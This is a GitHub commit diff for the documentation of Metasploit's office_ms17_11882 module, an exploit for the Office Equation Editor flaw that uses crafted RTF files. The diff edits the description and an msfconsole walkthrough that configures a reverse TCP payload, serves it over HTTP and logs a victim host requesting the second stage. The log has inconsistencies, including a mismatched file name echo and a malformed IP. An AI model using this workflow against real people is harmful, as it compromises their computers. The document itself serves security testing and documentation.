Skip to content

Commit b7f17f5

Browse files
author
Austin
authored
fix documentation
1 parent c788e4e commit b7f17f5

File tree

1 file changed

+5
-8
lines changed

1 file changed

+5
-8
lines changed

documentation/modules/exploit/windows/fileformat/office_ms17_11882.md

Lines changed: 5 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
1-
Office products within the last 17 years allow an attacker to execute arbitrary commands through memory corruption in Office documents. This occurs in how MS office fails to properly handle OLE objects in memory. Requires an victim
2-
to open an MS `.rtf` file. In addition for the payload to be executed, the user must not open as read-only. Otherwise requires no interaction beyond that from the user.
1+
2+
Module exploits a flaw in how the Equation Editor that allows an attacker to execute arbitrary code in RTF files without interaction. The vulnerability is caused by the Equation Editor, to which fails to properly handle OLE objects in memory.
33

44
## Vulnerable Application
55

@@ -24,18 +24,15 @@ Filename to output, and location to which should be written.
2424

2525
```
2626
msf > use exploit/windows/fileformat/office_ms17_11882
27-
msf exploit(office_ms17_11882) > set FILENAME /home/mumbai/file.rtf
27+
msf exploit(office_ms17_11882) > set FILENAME msf.rtf
2828
FILENAME => /home/mumbai/file.rtf
2929
msf exploit(office_ms17_11882) > set LHOST ens3
3030
LHOST => ens3
3131
msf exploit(office_ms17_11882) > set LPORT 35116
3232
LPORT => 35116
3333
msf exploit(office_ms17_11882) > run
34-
[*] Exploit running as background job 0.
35-
36-
[*] Started reverse TCP handler on 192.168.0.11:35116
37-
msf exploit(office_ms17_11882) > [*] Using URL: http://0.0.0.0:8080/e08qBLfVxgaJZPo
38-
[*] Local IP: http://192.168.0.11:8080/e08qBLfVxgaJZPo
34+
[*] Using URL: http://0.0.0.0:8080/BUY0DYgc
35+
[*] Local IP: http://192.1668.0.11:8080/BUY0DYgc
3936
[*] Server started.
4037
[*] 192.168.0.24 office_ms17_11882 - Handling initial request from 192.168.0.24
4138
[*] 192.168.0.24 office_ms17_11882 - Stage two requestd, sending

0 commit comments

Comments
 (0)